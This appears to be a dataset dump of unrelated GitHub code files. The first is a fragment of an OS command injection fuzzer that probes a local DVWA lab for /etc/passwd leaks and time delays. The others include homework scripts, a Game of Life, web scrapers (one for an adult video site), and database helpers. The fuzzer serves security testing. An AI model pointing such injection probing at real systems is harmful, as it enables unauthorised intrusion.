       break\n            x = random.randrange(0, len(payloads))\n            check = self.scanner_oscmd(url, method, params, cookies, payloadList[x])\n            j = j + 1\n            if check == 1:\n                return 0\n            time.sleep(2)\n\n        \n\n    def scanner_oscmd(self, url, method, params, cookies, payload):\n        import time\n        status_code = 500\n        r = None\n        content = None\n        status_code = 200\n        conn = connect()\n\n        start = time.time()\n\n        # Extra parameters need to be passed in to support the POST functionality\n        if method == \"GET\" or method == \"get\":\n            url = url+ payload # concatenate the payload onto the URL!\n            r = conn.gett(url, params, payload, cookies)\n        if method == \"POST\" or method == \"post\":\n            r = conn.postt(url, params, payload, cookies)\n\n        content = str(r.content)\n\n        check = 0\n        for i in detect_etc_passwd:\n            if i in content:\n                check = 1\n        if check == 1:\n            print(\"OS command injection: \" + url)\n            return 1\n        \n\n        for i in detect_echo:\n            if (i in content) and (payload in content):\n                return 0\n            if i in content:\n                print(\"OS command injection: \" + url)\n                return 1\n        \n\n        elapsed = time.time() - start\n        if elapsed >= 5:\n            print (\"time-based command injection: \" + url)\n            return 1\n        return 0\nfrom crawler import crawler\n\na = cmd()\ncookie = {\"PHPSESSID\" : \"f2c280e624310d43cafd4cebf90a1768\", \"security\": \"low\"}\ncrawl = crawler(\"http://localhost/dvwa/\", [] ,cookie)\nlistedCrawl = crawl.run_crawler()\n\nfor i in listedCrawl:\n    print(i)\n\n\n\n\n    ","repo_name":"nguyenanh1997/Fuzzz","sub_path":"1Fuzz_copy/OScmd.py","file_name":"OScmd.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"20152359554","text":"\"\"\"\nimplement a program in Python that prompts the user for mass as an integer (in kilograms) \nand then outputs the equivalent number of Joules as an integer. Assume that the user \nwill input an integer.\n\"\"\"\ndef Calculate_energy ():\n    m = int(input(\"enter the mass in kilogram: \"))\n    c = (3 * 10**8)**2\n    E = m*c\n    print(\"Energy in joules:\",E)\nCalculate_energy()","repo_name":"JuttSidho/ch_1-problem_set","sub_path":"einstein.py","file_name":"einstein.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"29127388542","text":"import pygame as pygame\nimport sys\n\nfrom grid import Grid\n\n\nclass Gui:\n    BLACK = (0, 0, 0)\n    WHITE = (200, 200, 200)\n    BLUE = (0, 0, 255)\n\n    def __init__(self, height, width, time):\n        self.WINDOW_HEIGHT = height * 20\n        self.WINDOW_WIDTH = width * 20\n        self.time = time\n        pygame.init()\n        self.SCREEN = pygame.display.set_mode((self.WINDOW_WIDTH, self.WINDOW_HEIGHT))\n        self.CLOCK = pygame.time.Clock()\n        self.SCREEN.fill(self.BLACK)\n        self.main_grid = Grid(self.WINDOW_WIDTH, self.WINDOW_HEIGHT)\n\n    def draw_grid(self, grid_class):\n        grid = grid_class.get_grid()\n        grid_global = grid_class.get_grid()\n        block_size = 20\n        for i in range(len(grid)):\n            for j in range(len(grid[i])):\n                rect = pygame.Rect(j * 20, i * 20, block_size, block_size)\n                if grid[i][j] == 1:\n                    pygame.draw.rect(self.SCREEN, self.WHITE, rect, 0)\n                else:\n                    pygame.draw.rect(self.SCREEN, self.BLACK, rect, 0)\n\n        for x in range(0, self.WINDOW_WIDTH, block_size):\n            for y in range(0, self.WINDOW_HEIGHT, block_size):\n                rect = pygame.Rect(x, y, block_size, block_size)\n                pygame.draw.rect(self.SCREEN, self.BLUE, rect, 1)\n        for i in range(len(grid)):\n            for j in range(len(grid[i])):\n                state = grid[i][j]\n                neighbours = self.count_neighbours(grid, i, j)\n                if state == 0 and neighbours == 3:\n                    grid_global[i][j] = 1\n                elif state == 1 and (neighbours < 2 or neighbours > 3):\n                    grid_global[i][j] = 0\n                else:\n                    grid_global[i][j] = state\n        grid_class.update_values(grid_global)\n        pygame.time.wait(self.time)\n\n    def count_neighbours(self, grid, x, y):\n        sum_of_neighbours = 0\n        for i in range(-1, +2):\n            for j in range(-1, +2):\n                col = int((x + i + int(self.WINDOW_WIDTH / 20)) % int(self.WINDOW_WIDTH / 20))\n                row = int((y + j + int(self.WINDOW_HEIGHT / 20)) % int(self.WINDOW_HEIGHT / 20))\n                sum_of_neighbours += grid[row][col]\n        
sum_of_neighbours -= grid[x][y]\n return sum_of_neighbours\n\n def run(self):\n while True:\n self.draw_grid(self.main_grid)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n pygame.display.update()\n","repo_name":"DalduK/GameOfLifePygame","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33237340005","text":"import galleryCrawler as gC\nimport re\nimport json\n\nclass SantaEvent(gC.rssImageExtractor):\n website = \"moviespornsex.com\"\n\n def start_requests(self):\n try:\n filename = gC.sys.argv[1]\n except:\n # filename2 = \"upperbound.opml\"\n filename = \"galleryLinks.opml\"\n # filename = \"StaticLinks.opml\"\n # filename = \"Test.opml\"\n t = open(filename, \"r+\")\n urls = t.readlines()\n t.close()\n gC.random.shuffle(urls)\n for url in urls:\n sqaureP = gC.re.search(\"@\\[(.*)\\]\", url)\n if sqaureP != None:\n lb, ub = [int(x) for x in gC.re.split(\"[-,]\",sqaureP[1])]\n NewUrls = [url.replace(sqaureP[0],str(ui)) for ui in range(lb,ub)]\n [urls.append(NewUrl) for NewUrl in NewUrls]\n continue\n if self.website in url:\n yield gC.scrapy.Request(url=url.rstrip(), callback=self.parseFnc)\n\n def parseFnc(self,response):\n print(self.website)\n url = response.url.strip(\"/#\")\n reso_list = ['1080p', '720p', '480p', '320p', '240p']\n # import pdb;pdb.set_trace()\n videoUrl = response.css('source::attr(src)').extract()\n fileNames = [response.url.rstrip('/').split('/')[-1]+'.mp4']\n print(videoUrl)\n # fileNames = [re.split('[=]',x)[-1] for x in videoUrl] if fileNames == [] else fileNames\n self.downloadGalleryGeneric(response, videoUrl, fileNames, fileNames[0],True,\"gifs\" )\n \n def singleToManyImg(self,response,iurl,l=0,u=20):\n # import pdb; pdb.set_trace()\n print(iurl)\n imgUrls = [iurl.replace(\"@\",str(i)) for i in range(l,u)]\n galcode = iurl.split(\"/\")[-2]\n fileNames = [galcode+\" %s .jpg\" % str(i) for i in range(l,u)]\n self.downloadGalleryGeneric(response, imgUrls, fileNames, galCode=galcode)\n\nif __name__ == \"__main__\":\n print(SantaEvent.website)\n try:\n process = gC.CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n process.crawl(SantaEvent)\n process.start()\n except Exception as e:\n with open(\"log.txt\", \"a+\") as inF:\n inF.write(str(e) + \"\\n\")\n","repo_name":"BeautyScraper/GalleryDownloader","sub_path":"moviespornsex.py","file_name":"moviespornsex.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33090818400","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL_WILDBERRIES = 'https://www.wildberries.ru/brands/polezzno'\nURL_VAMPOLEZNO = 'https://vampolezno.com/polezzno/'\nURL_FOURFRESH = 'https://4fresh.ru/catalog/food'\n\n\nHEADERS = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/91.0.4472.135 YaBrowser/21.6.2.855 Yowser/2.5 Safari/537.36', 'accept' : '*/*'}\n\n# SEARCHED_ELEMENT = ('Чай матча зеленая/рассыпной', 'Чай матча голубая', 'Кисель')\n# # searched_element = SEARCHED_ELEMENT[2]\nsearched_element = 'матча'\n\nHOST_WILDBERRIES = 'https://www.wildberries.ru'\nHOST_VAMPOLEZNO = 'https://vampolezno.com'\nHOST_FOURFRESH = 'https://4fresh.ru'\n\nFILE = 'Информация о ценах.txt'\n\ndef get_html(url, params = None):\n result = 
requests.get(url=url, headers = HEADERS, params=params)\n    return result\n\ndef get_pagination_next(html, host):\n    soup = BeautifulSoup(html, 'html.parser')\n    page_next = host + soup.find('a', class_='pagination-next').get('href')\n    return page_next\n\ndef get_pagination_vampolezno(html):\n    soup = BeautifulSoup(html, 'html.parser')\n    page_cout = int(soup.find('ul', class_='menu-h').get_text()[-2])\n    return page_cout\n\ndef get_pagination_fourfresh(html):\n    soup = BeautifulSoup(html, 'html.parser')\n    page_next = HOST_FOURFRESH + soup.find('a', class_='next').get('href')\n    return page_next\n\ndef total_produkt_fourfresh(html):\n    soup = BeautifulSoup(html, 'html.parser')\n    total_produkt_ctr = soup.find('span', class_='showing').get_text(strip=True)\n    total_produkt = int(total_produkt_ctr.split(' ')[-1])\n    return total_produkt\n\n\n\ndef record_info(prise, link, shop_name, produkt):\n    with open(FILE, 'a', encoding='utf8') as file:\n        # shope_name = host.split('.')[1]\n        file.write(shop_name + '\\n' + produkt + '\\n' + prise + '\\n' + link + '\\n' + '\\n\\n\\n')\n\ndef get_content_waldberries(html):\n    print('Parsing in progress ...')\n    soup = BeautifulSoup(html, 'html.parser')\n    items = soup.find_all('a', class_='ref_goods_n_p j-open-full-product-card')\n    for item in items:\n        # print(item.find('span', class_='goods-name').get_text(strip=True))\n        if searched_element in item.find('span', class_='goods-name').get_text(strip=True):\n            produkt = item.find('span', class_='goods-name').get_text(strip=True)\n            # print(item.find('span', class_='goods-name').get_text(strip=True))\n            link = HOST_WILDBERRIES + item.get('href')\n            prise = item.find('span', class_='price').get_text(strip=True)\n            print(f'Product found on site {HOST_WILDBERRIES}.')\n            record_info(prise=prise, link=link, shop_name='Wildberries', produkt=produkt)\n\ndef parse_waldberries():\n    html = get_html(url=URL_WILDBERRIES)\n    if html.status_code == 200:\n        while True:\n            get_content_waldberries(html=html.text)\n            try:\n                page_next = get_pagination_next(html=html.text, host=HOST_WILDBERRIES)\n                html = get_html(url=page_next)\n            except AttributeError:\n                print('All pages have been checked')\n                break\n    else:\n        print('The page is not available')\n\ndef get_content_vampolezno(html):\n    print('Parsing in progress ...')\n    soup = BeautifulSoup(html, 'html.parser')\n    items = soup.find_all('li', class_='tabs-shadow-category')\n    print(len(items))\n    for item in items:\n        # print(item.find('h5').get_text(strip=True))\n        if searched_element in item.find('h5').get_text(strip=True):\n            produkt = item.find('h5').get_text(strip=True)\n            link = HOST_VAMPOLEZNO + item.find('a').get('href')\n            prise = item.find('div', class_='pricing radiocard prcb-single').get_text(strip=True)\n            print(f'Product found on site {HOST_VAMPOLEZNO}.')\n            record_info(prise=prise, link=link, shop_name='Vampolezno', produkt=produkt)\n\ndef parse_vampolezno():\n    html = get_html(url=URL_VAMPOLEZNO)\n    if html.status_code == 200:\n        page_cout = get_pagination_vampolezno(html=html.text)\n        for page in range(1, page_cout+1):\n            if page == 1:\n                get_content_vampolezno(html=html.text)\n                continue\n            html = get_html(url=URL_VAMPOLEZNO, params=f'page={page}')\n            get_content_vampolezno(html=html.text)\n        else:\n            print('All pages have been checked')\n    else:\n        print('The page is not available')\n\ndef get_content_fourfresh(html):\n    print('Parsing in progress ...')\n    soup = BeautifulSoup(html, 'html.parser')\n    items = soup.find_all('article', class_='prod-card-small')\n    for item in items:\n        # print(item.find('a', class_='ci-list-item__name').get_text(strip=True))\n        if searched_element in item.find('a', class_='ci-list-item__name').get_text(strip=True):\n            produkt = item.find('a', class_='ci-list-item__name').get_text(strip=True)\n            link = HOST_FOURFRESH + item.find('a').get('href')\n            prise = item.find('div', class_='ci-actual-price').get_text(strip=True)\n            print(f'Product found on site {HOST_FOURFRESH}.')\n            print(link, prise)\n            record_info(prise=prise, link=link, shop_name='4fresh', produkt=produkt)\n\ndef parse_fourfresh():\n    html = get_html(url=URL_FOURFRESH)\n    if html.status_code == 200:\n        produkt_total = total_produkt_fourfresh(html=html.text)\n        produkt_coul = 0\n        while produkt_coul <= produkt_total:\n            get_content_fourfresh(html=html.text)\n            produkt_coul += 30\n            page_next = get_pagination_fourfresh(html=html.text)\n            # print(page_next)\n            html = get_html(url=page_next)\n            print(f'Checked {produkt_coul} products.')\n    else:\n        print('The page is not available')\n\n\n# parse_waldberries()\n# parse_vampolezno()\nparse_fourfresh()\n\n# url = URL_VAMPOLEZNO\n# html = get_html(url=url, params=None)\n# get_content_next(html=html.text)\n\n# print(prise, link)\n# print(get_pagination_next(html=html.text))","repo_name":"Oshten/Parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"39523141109","text":"import re, logging\nfrom numbers import Number\nfrom itertools import imap\n\nimport pymongo\n\nfrom fbvoting.db.db import mongodb\nfrom fbvoting.rediscache import redis_cached\n\nlogger = logging.getLogger(__name__)\n\nsorting_order = [('rank', pymongo.DESCENDING), ('_id', pymongo.ASCENDING)]\n\n@redis_cached\ndef _get_norm(category):\n    return mongodb.chartnorm.find({\"_id\": category}, limit=1)[0]['norm']\n\n\ndef _normalizator(category):\n    norm = _get_norm(category)\n    def _norm_rank(db_obj):\n        db_obj['rank'] /= norm\n        return db_obj\n    return _norm_rank\n\n\ndef chart_iterator(category):\n    \"\"\" Returns an iterator over documents such as {'advice': ..., 'rank': ...}\n    sorted by rank. \"\"\"\n    assert type(category) in (str, unicode)\n    \n    collection = mongodb['chart-' + category]\n    db_cursor = collection.find(\n        sort=sorting_order,\n        fields= {'advice': 1, 'rank':1, '_id': 0}\n    )\n    \n    return imap(_normalizator(category), db_cursor)\n\ndef get_chart_elements_higher_than(min_rank, category, exclude_ids=None):\n    \"\"\" Return an iterator over doc such as {'advice':x, 'rank': y} for all\n    documents with rank higher than min_rank. \"\"\"\n    assert isinstance(min_rank, Number)\n    assert type(category) in (str, unicode)\n    assert type(exclude_ids) in (type(None), list, tuple)\n    \n    min_rank = min_rank * _get_norm(category) # un-normalizing\n    \n    query = {\"rank\" : {\"$gte\": min_rank}}\n    if exclude_ids:\n        query[\"_id\"] = {\"$nin\": exclude_ids}\n    \n    db_cursor = mongodb['chart-' + category].find(query,\n            fields= {'advice': 1, 'rank':1, '_id': 0})\n    return imap(_normalizator(category), db_cursor)\n\n\ndef get_sorted_chart_elements_lower_than(max_rank, category, exclude_ids=None):\n    \"\"\" Return an iterator over doc such as {'advice':x, 'rank': y} for all\n    documents with rank lower than max_rank, sorted by their rank. \"\"\"\n    assert isinstance(max_rank, Number)\n    assert type(category) in (str, unicode)\n    assert type(exclude_ids) in (type(None), list, tuple)\n    \n    max_rank = max_rank * _get_norm(category) # un-normalizing\n    \n    query = {\"rank\" : {\"$lt\": max_rank}}\n    if exclude_ids:\n        query[\"_id\"] = {\"$nin\": exclude_ids}\n    \n    db_cursor = mongodb['chart-' + category].find(query, sort=sorting_order,\n            fields= {'advice': 1, 'rank':1, '_id': 0})\n    return imap(_normalizator(category), db_cursor)\n\ndef count(category):\n    assert type(category) in (str, unicode)\n    return mongodb['chart-' + category].count()\n\n\ndef find_rank(partial_dbdoc, category):\n    \"\"\" Given a dbdoc like ( (\"author\": ...), (\"song\": ...) )\n    find a case insensitive match in the chart, and return\n    the mongo document of that match (a dict with keys\n    'advice', 'rank', '_id'). If it does not exist in the chart, returns None. \"\"\"\n    \n    assert type(category) in (str, unicode)\n    assert type(partial_dbdoc) is tuple\n\n    query = dict([(\"advice.\"+key, re.compile(re.escape(value), re.IGNORECASE)) for (key, value) in partial_dbdoc])\n    \n    results = list(mongodb['chart-' + category].find(query, limit=1))\n    \n    if results:\n        return _normalizator(category)(results[0])\n    else:\n        return None\n\n\n@redis_cached\ndef find_position(video_id, category):\n    \"\"\" Returns the number of elements that come before\n    the specified video. \"\"\"\n    assert type(video_id) in (str, unicode)\n    assert type(category) in (str, unicode)\n    \n    collection = mongodb['chart-' + category]\n    \n    matching_docs = list(collection.find(\n        {\"advice.video\": video_id},\n        sort=sorting_order,\n        fields= {'rank':1, '_id': 1},\n        limit=1\n    ))\n    \n    if matching_docs:\n        rank_of_video = matching_docs[0][\"rank\"]\n        id_of_video = matching_docs[0][\"_id\"]\n    else:\n        return None\n    \n    n_with_more_rank = collection.find(\n        {\"rank\": {\"$gt\": rank_of_video}},\n        fields={'_id':1}\n    ).count()\n    \n    n_of_ties_before = collection.find(\n        {\"rank\": rank_of_video, \"_id\": {\"$lt\": id_of_video}},\n        fields={'_id':1}\n    ).count()\n    \n    return n_with_more_rank + n_of_ties_before\n    \n    \n\n","repo_name":"corradomonti/fbvoting","sub_path":"fbvoting/db/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
+{"seq_id":"38792531724","text":"\"\"\"\nHomework\n# 1. Use a for loop to print the 6 times table of the multiplication tables.\n\n# 2. Print Hello as many times as specified.\n# Use a for loop, not string multiplication.\n\n# 3. Determine whether the integer you entered is a prime number or not.\n# A prime number is a positive integer of 2 or greater that has exactly 2 divisors.\n# Use a for loop.\n\"\"\"\n# 1. The 6 times table\nfor i in range(1,10):\n    print(\"6 x %d = %2d\"%(i,(6*i)))\nprint()\n\n# 2. Print Hello the specified number of times \nnum = input(\"Enter the count >> \") # EX) 3회 (the trailing character is stripped below)\nnum = int(num[:-1])\nfor i in range(num):\n    print(\"Hello\", end=\" \")\nprint()\n\n\n# 3. Determine whether the entered integer is a prime number or not\ncount = 0\n\ntmp = int(input(\"Enter an integer of 2 or greater to test for primality >> \"))\nfor i in range(1,tmp+1):\n    if tmp % i == 0:\n        count += 1\n\nif count == 2:\n    print(\"%d is a prime number.\"%(tmp))\nelse:\n    print(\"%d is not a prime number.\"%(tmp))","repo_name":"LeeBG/PythonStudy","sub_path":"day15/11.for반복문(숙제).py","file_name":"11.for반복문(숙제).py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"74328927204","text":"import csv\nimport os\nfrom collections import defaultdict\nimport sys\nimport difflib\nimport string\nfrom time import time\nimport random\nimport re\nimport datetime\nimport pickle\nimport decimal\nfrom company_score_tfidf import keyword_score_map\n\nclass CompanyNameSimilarity:\n    \n    def preprocess(self, field):\n        return field.encode('utf-8').lower().replace('\\n','').replace(\"'\",' ').replace('\\r','').replace('/',' ').\\\n            replace('&',' ').replace('-',' ').replace('|','').replace(',','').replace('.',' ').replace('@',' ').replace('#',' ')\n\n    def normalize_company_name(self, company_name):\n        stop_list = [\"organisation\",\"org\",\"inc\", \"ltd\", \"labs\", \"lab\", \"llc\",\n                     \"llp\", \"corporation\", \"corp\",\"fed\",\"plc\",\"inc\", \"co\", \"svc\",\"services\",\"service\", \"company\",\n                     \"dept\",\"department\",\"assoc\",\"association\",\"limited\",\"incorporation\"]\n        abbreviate = {\n            \"cu\":\"credit union\"\n        }\n        return \" \".join([self.preprocess(word).strip() if self.preprocess(word) not in abbreviate else abbreviate[self.preprocess(word)] \\\n                         for word in company_name.split() if self.preprocess(word).strip() not in stop_list])\n    \n\n    def is_company_approx_contained(self, str1, str2):\n        approx_contained_threshold = 0.3\n        if len(str1) == 0:\n            return False\n        str1_set = set([x.lower().strip() for x in str1.split()])\n        str2_set = set([x.lower().strip() for x in str2.split()])\n        if len(list(str1_set)) == 0 or len(list(str2_set)) == 0:\n            return False\n        score_num = len(str1_set & str2_set)\n        score_den1 = len(str1_set)\n        score_den2 = len(str2_set)\n        return ((float(score_num) / float(score_den1))+(float(score_num)/float(score_den2)))/2 > approx_contained_threshold\n\n    \n    def match_score(self, str1, str2, mode = 'reflex'):\n        str1 = self.normalize_company_name(str1)\n        str2 = self.normalize_company_name(str2)\n        if len(str1) == 0:\n            return 0\n        str1_set = set([x.lower().strip() for x in str1.split()])\n        str2_set = set([x.lower().strip() for x in str2.split()])\n        if len(list(str1_set)) == 0 or len(list(str2_set)) == 0:\n            return 0\n        if not self.is_company_approx_contained(str1,str2):\n            return 0\n        mismatch_set1=[elem for elem in str1.split() if elem not in (str1_set & str2_set)]\n        mismatch_set2=[elem for elem in str2.split() if elem not in (str1_set & str2_set)]\n        partial_match_score_1 = self.compute_partial_match_score(mismatch_set1,mismatch_set2)\n        partial_match_score_2 = self.compute_partial_match_score(mismatch_set2,mismatch_set1)\n        score_num = len(str1_set & str2_set)\n        score_den1 = len(str1_set)\n        score_den2 = len(str2_set)\n        if mode == 'non-reflex':\n            return float(score_num + partial_match_score_1) / float(score_den1)\n        if mode == 'reflex':\n            return ((float(score_num + partial_match_score_1) / float(score_den1))+(float(score_num + partial_match_score_2)/float(score_den2)))/2\n\n\n    def compute_partial_match_score(self, set_str1,set_str2):\n        set_compute = set_str1\n        set_check = set_str2\n        if len(set_compute)==0:\n            return 0\n        score=0\n        for word in set_compute:\n            
check_word_list=difflib.get_close_matches(word,set_check, n=1, cutoff=0.6)\n score += (-float(self.score_company_name(set([word])))) if len(check_word_list) == 0 \\\n else difflib.SequenceMatcher(None,word, check_word_list[0] ).ratio()\n if len(check_word_list) > 0:\n if check_word_list[0] in set_check: set_check.remove(check_word_list[0])\n return score\n\n def score_company_name(self,word_set):\n score = 0\n for word in list(word_set):\n if not word in keyword_score_map:\n score += 1.0\n else:\n score += float(keyword_score_map[word])\n return score ","repo_name":"asamat/compsim","sub_path":"compsim/company_name_similarity.py","file_name":"company_name_similarity.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"27485568473","text":"import os\n\nimport tensorflow as tf\nfrom tfx.types import channel_utils\n\nfrom tfx_x import PipelineConfiguration\nfrom tfx_x.components.configuration.converter import component\nfrom tfx_x.components.configuration.converter.executor import PIPELINE_CONFIGURATION_KEY\n\n\nclass ExportTest(tf.test.TestCase):\n\n def setUp(self):\n super(ExportTest, self).setUp()\n self.name = 'HelloWorld'\n self._output_data_dir = os.path.join(\n os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),\n self._testMethodName)\n\n def testConstruct(self):\n custom_config = {'pouet': 12,\n 'blah': ['1', '2', '3'],\n 'plaff': 3.1415}\n\n self._output_configuration_dir = os.path.join(self._output_data_dir,\n 'output_examples')\n pipeline_configuration = PipelineConfiguration()\n pipeline_configuration.uri = self._output_configuration_dir\n\n this_component = component.FromCustomConfig(custom_config=custom_config,\n pipeline_configuration=channel_utils.as_channel(\n [pipeline_configuration])).with_id(u'Testing123')\n self.assertEqual(PipelineConfiguration.TYPE_NAME,\n this_component.outputs[PIPELINE_CONFIGURATION_KEY].type_name)\n artifact_collection = this_component.outputs[PIPELINE_CONFIGURATION_KEY].get()\n self.assertIsNotNone(artifact_collection)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"ssoudan/tfx_x","sub_path":"tfx_x/components/configuration/converter/component_test.py","file_name":"component_test.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43531001608","text":"import os\nimport json\nimport pendulum\n\nfrom airflow import DAG\nfrom airflow.operators.dummy import DummyOperator\nfrom airflow.operators.python import PythonOperator, BranchPythonOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\nfrom airflow.providers.databricks.operators.databricks import DatabricksRunNowOperator, DatabricksSubmitRunOperator\nfrom datetime import datetime, timedelta\n\nfrom airflow.utils.task_group import TaskGroup\nfrom airflow.utils.trigger_rule import TriggerRule\nfrom pendulum.tz.timezone import Timezone\nfrom custom.operators import AutoReportValidationOperator, DailyUtils, BaseUtils\n\n_BASE_PATH = \"/usr/local/airflow/dags\"\ndef _get_notebook_params(**kwargs):\n \"\"\"\n A method for getting notebook params\n \"\"\"\n ti = kwargs[\"ti\"]\n\n print(\"=========================CHECK_ENV_PARAMS=========================\")\n print(f\"{kwargs['env']}\")\n\n\n file_path = os.path.join(_BASE_PATH, \"configs\", \"propfit\", f\"blacklist.json\")\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n notebook_params 
= json.load(f)\n\n for k, v in notebook_params.items():\n ti.xcom_push(key=k, value=v)\n\n# def _get_validation_config(**kwargs):\n# \"\"\"\n# A method for getting data validation config\n# \"\"\"\n# ti = kwargs[\"ti\"]\n# file_path = os.path.join(_BASE_PATH, \"configs\", \"databricks\", \"validation_config.json\")\n# with open(file_path, \"r\", encoding=\"utf-8\") as f:\n# validation_config = json.load(f)\n#\n# print(f\"[CHECK-VALIDATION-CONFIG]{validation_config}\")\n# ti.xcom_push(key=\"validation_config\", value=validation_config)\n#\n# # (!) changeable\n# table_names = [\n# \"fb_funble_ad_stats\",\n# ]\n#\n# print(f\"[CHECK-VALIDATION-TABLE-NAME]{table_names}\")\n# ti.xcom_push(key=\"table_names\", value=\",\".join(table_names))\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=2)\n}\n\n################################### API ###################################\n\n\nwith DAG(f\"{os.path.basename(__file__).replace('.py', '')}\",\n start_date=datetime(2023, 5, 12, tzinfo=Timezone(\"Asia/Seoul\")),\n schedule_interval=None,\n catchup=False,\n default_args=default_args,\n render_template_as_native_obj=True,\n tags=[\"propfit\", \"blacklist\", \"domain\", \"daily\"]\n ) as dag_api:\n\n env = \"dev\"\n project = \"propfit\"\n\n start = DummyOperator(task_id=\"start\")\n end = DummyOperator(task_id=\"end\")\n\n get_notebook_params = PythonOperator(\n task_id=\"get_notebook_params\",\n python_callable=_get_notebook_params,\n op_kwargs={\"env\": env},\n trigger_rule=TriggerRule.ALL_SUCCESS,\n )\n\n with TaskGroup(group_id=\"main_tasks\") as main_tasks:\n main_tasks_start = DummyOperator(\n task_id=\"main_tasks_start\",\n trigger_rule=TriggerRule.ALL_SUCCESS\n )\n\n propfit_blacklist_api = DatabricksRunNowOperator(\n task_id=\"propfit_blacklist_api\",\n job_id=\"{{ ti.xcom_pull(task_ids='get_notebook_params', key='job_id') }}\",\n notebook_params={\n \"env\": env,\n \"start_date\": \"2023-03-01\",\n \"end_date\": \"2023-03-31\",\n \"advertiser_idx\": \"5\",\n \"under_threshold\": \"2000\",\n },\n trigger_rule=TriggerRule.ALL_SUCCESS\n )\n\n main_tasks_start >> propfit_blacklist_api\n\n ############################## (!) 
dag ##############################\n start >> get_notebook_params >> main_tasks >> end\n\n\n\n\n\n\n\n","repo_name":"nazzang49/ptbwa-airflow-dags","sub_path":"dags/propfit_daily_blacklist.py","file_name":"propfit_daily_blacklist.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"16751639950","text":"import math\nimport typing\n\nimport numpy as np # type: ignore # pylint: disable=E0401\nimport pandas as pd # type: ignore # pylint: disable=E0401\n\nfrom .pkg_types import GraphLike\n\nGPU_COUNT: int = 0\n\n\ndef get_gpu_count () -> int:\n \"\"\"\nSpecial handling for detecting GPU availability: an approach\nrecommended by the NVidia RAPIDS engineering team, since `nvml`\nbindings are difficult for Python libraries to keep updated.\n\n returns:\ncount of available GPUs, where `0` means none or disabled.\n \"\"\"\n global GPU_COUNT # pylint: disable=W0603\n\n if GPU_COUNT < 0:\n return 0\n\n try:\n import pynvml # type: ignore # pylint: disable=E0401\n pynvml.nvmlInit()\n\n GPU_COUNT = pynvml.nvmlDeviceGetCount()\n except Exception: # pylint: disable=W0703\n GPU_COUNT = -1\n\n return GPU_COUNT\n\n\nif get_gpu_count() > 0:\n try:\n import cudf # type: ignore # pylint: disable=E0401\n except Exception as gpu_e: # pylint: disable=W0703\n # turn off GPU usage\n #print(gpu_e)\n GPU_COUNT = -1\n\n\ndef calc_quantile_bins (\n num_rows: int\n ) -> np.ndarray:\n \"\"\"\nCalculate the bins to use for a quantile stripe, using [`numpy.linspace`](https://numpy.org/doc/stable/reference/generated/numpy.linspace.html)\n\n num_rows:\nnumber of rows in the target dataframe\n\n returns:\nthe calculated bins, as a [`numpy.ndarray`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.html)\n \"\"\"\n granularity = max(round(math.log(num_rows) * 4), 1)\n return np.linspace(0, 1, num=granularity, endpoint=True)\n\n\ndef stripe_column (\n values: list,\n bins: int,\n *,\n use_gpus: bool = False,\n ) -> np.ndarray:\n \"\"\"\nStripe a column in a dataframe, by interpolating quantiles into a set of discrete indexes.\n\n values:\nlist of values to stripe\n\n bins:\nquantile bins; see [`calc_quantile_bins()`](#calc_quantile_bins-function)\n\n use_gpus:\noptionally, use the NVidia GPU devices with the [RAPIDS libraries](https://rapids.ai/) if these libraries have been installed and the devices are available; defaults to `False`\n\n returns:\nthe striped column values, as a [`numpy.ndarray`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.html); uses the [RAPIDS `cuDF` library](https://docs.rapids.ai/api/cudf/stable/) if GPUs are enabled\n \"\"\"\n if use_gpus:\n s = cudf.Series(values)\n else:\n s = pd.Series(values)\n\n q = s.quantile(bins, interpolation=\"nearest\")\n\n try:\n stripe = np.digitize(values, q) - 1\n return stripe\n except ValueError as e:\n # should never happen?\n print(\"ValueError:\", str(e), values, s, q, bins)\n raise\n\n\ndef root_mean_square (\n values: list\n ) -> float:\n \"\"\"\nCalculate the [*root mean square*](https://mathworld.wolfram.com/Root-Mean-Square.html) of the values in the given list.\n\n values:\nlist of values to use in the RMS calculation\n\n returns:\nRMS metric as a float\n \"\"\"\n s = sum(map(lambda x: float(x)**2.0, values))\n n = float(len(values))\n return math.sqrt(s / n)\n\nclass Mixin:\n 